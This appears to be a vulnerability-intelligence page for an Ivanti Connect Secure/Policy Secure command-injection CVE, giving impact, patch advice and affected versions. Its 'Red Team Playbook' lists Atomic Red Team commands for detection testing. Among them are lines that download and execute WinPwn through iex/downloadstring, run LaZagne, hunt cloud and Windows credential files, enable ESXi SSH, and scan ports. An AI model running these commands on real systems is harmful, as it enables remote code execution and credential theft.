CVE-2024-11634
Overview
This vulnerability is a command injection flaw rooted in improper input validation within Ivanti Connect Secure and Ivanti Policy Secure appliances prior to specified versions. The issue arises from the unsafe handling of administrator-supplied input in internal command execution routines, allowing crafted input to be interpreted as shell commands. The affected components are the administrative interfaces of Ivanti Connect Secure and Policy Secure prior to versions 22.7R2.3 and 22.7R1.2 respectively, excluding 9.1Rx releases.
Vulnerability Description
Command injection in Ivanti Connect Secure before version 22.7R2.3 and Ivanti Policy Secure before version 22.7R1.2 allows a remote authenticated attacker with admin privileges to achieve remote code execution. (Not applicable to 9.1Rx)
Impact
An attacker with valid administrator credentials can execute arbitrary system commands remotely, leading to full system compromise including data access, configuration manipulation, and service disruption. The attack requires authenticated high-privilege access (PR:H) over the network (AV:N) without user interaction (UI:N). This can facilitate lateral movement within the environment and persistent control over the affected appliance, severely impacting confidentiality, integrity, and availability as indicated by the CVSS vector.
Solution
Ivanti recommends upgrading Ivanti Connect Secure to version 22.7R2.3 or later and Ivanti Policy Secure to version 22.7R1.2 or later to remediate this vulnerability. Detailed patch instructions and advisory information are available in the Ivanti December 2024 Security Advisory at https://forums.ivanti.com/s/article/December-2024-Security-Advisory-Ivanti-Connect-Secure-ICS-and-Ivanti-Policy-Secure-IPS-Multiple-CVEs. No specific workarounds are provided; immediate application of the vendor-supplied patches is advised.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in specific versions of Ivanti Connect Secure and Ivanti Policy Secure is characterized by a command injection flaw that allows remote authenticated attackers with administrative privileges to execute arbitrary code on the affected systems. This vulnerability arises from improper validation of user-supplied input, which can be exploited to manipulate system commands. Attackers can craft malicious input that the system inadvertently executes, leading to unauthorized access and control over the affected devices. The severity of this vulnerability is underscored by its CVSS score of 7.2, indicating a high level of risk that necessitates immediate attention from organizations utilizing these products.
Exploitation of this command injection vulnerability can occur through various attack vectors. An attacker with administrative access could leverage this flaw by sending specially crafted requests to the vulnerable system, potentially leading to a complete compromise of the device. Scenarios may include an attacker executing commands to install malware, exfiltrate sensitive data, or disrupt services. Given that the affected products are often deployed in environments that manage secure access to corporate networks, the implications of such exploitation could be severe, allowing attackers to pivot within the network and target additional resources.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on Ivanti's solutions for secure remote access and policy enforcement. Successful exploitation could lead to data breaches, loss of intellectual property, and severe reputational damage. The ability to execute arbitrary code remotely means that attackers could deploy ransomware or other malicious payloads, potentially leading to operational disruptions and financial losses. Furthermore, regulatory implications may arise if sensitive data is compromised, leading to legal repercussions and fines for non-compliance with data protection regulations.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating systems to the latest versions is critical, as the vendor has released patches that address this issue. Organizations should also conduct thorough vulnerability assessments and penetration testing to identify any potential weaknesses in their security posture. Additionally, employing intrusion detection systems (IDS) can help monitor for unusual activity that may indicate exploitation attempts. Implementing strict access controls and ensuring that only necessary administrative privileges are granted can further reduce the attack surface.
In conclusion, the command injection vulnerability in Ivanti Connect Secure and Ivanti Policy Secure poses a serious threat to organizations that utilize these products. The potential for remote code execution by authenticated attackers highlights the need for immediate action to mitigate risks. By adopting proactive security measures, including timely updates, continuous monitoring, and robust access controls, organizations can significantly reduce their exposure to this and similar vulnerabilities, safeguarding their critical assets and maintaining the integrity of their network environments.
CSURFACE threat intelligence has identified a modest increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-11634, reflecting a slight uptick in the likelihood of exploitation despite stable short-term trends. While no new exploit techniques or active campaigns have been detected by our sensors, this incremental rise suggests growing attacker interest or improved capability to leverage the vulnerability in Ivanti Connect Secure environments. The vulnerability remains highly consequential due to its potential for remote code execution by authenticated administrators, and the increased EPSS percentile ranking places it among the more probable targets in the current threat landscape. Consequently, defenders should recognize that the risk posture for this vulnerability has subtly intensified, warranting continued vigilance and prioritization in vulnerability management programs.
Affected Products (15)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Connect Secure | All |
cpe:2.3:a:ivanti:connect_secure:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:-:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.4:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.5:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r2.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r2.2:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | All |
cpe:2.3:a:ivanti:policy_secure:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 22.7 |
cpe:2.3:a:ivanti:policy_secure:22.7:-:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 22.7 |
cpe:2.3:a:ivanti:policy_secure:22.7:r1:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 22.7 |
cpe:2.3:a:ivanti:policy_secure:22.7:r1.1:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-11634 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/December-2024-Security-Advisory-Ivanti-Connect-Secure-ICS-and-Ivanti-Policy-Secure-IPS-Multiple-CVEs |